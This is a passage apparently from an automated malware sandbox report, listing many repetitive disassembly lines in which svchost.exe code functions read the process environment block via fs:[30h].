                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E59C mov eax, dword ptr fs:[00000030h]4_2_03A6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]4_2_03A5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A325E0 mov eax, dword ptr fs:[00000030h]4_2_03A325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C5ED mov eax, dword ptr fs:[00000030h]4_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6C5ED mov eax, dword ptr fs:[00000030h]4_2_03A6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E5CF mov eax, dword ptr fs:[00000030h]4_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6E5CF mov eax, dword ptr fs:[00000030h]4_2_03A6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A365D0 mov eax, dword ptr fs:[00000030h]4_2_03A365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]4_2_03A6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC6500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A68402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A50BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A30BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ADEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AF8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AF8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AFAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A38AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A86AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A68A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A86ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A30AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A64AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A64AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A54A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A36A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A40A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A429A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A309AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A629F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A3A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AFA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AAE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A28918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A56962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A7096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A7096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD4978 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AB0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A30887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AFA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A52835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03ABE872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AC6870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A42840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A60854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A34859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CF80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A62F98 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A62F98 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A4CFE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A70FF6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03B04FE7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AE6FF7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A32FC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A2EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5EF28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AE6F00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A32F12 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A6CF1F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03A5AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD2F60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4_2_03AD2F60 mov eax, dword ptr fs:[00000030h]
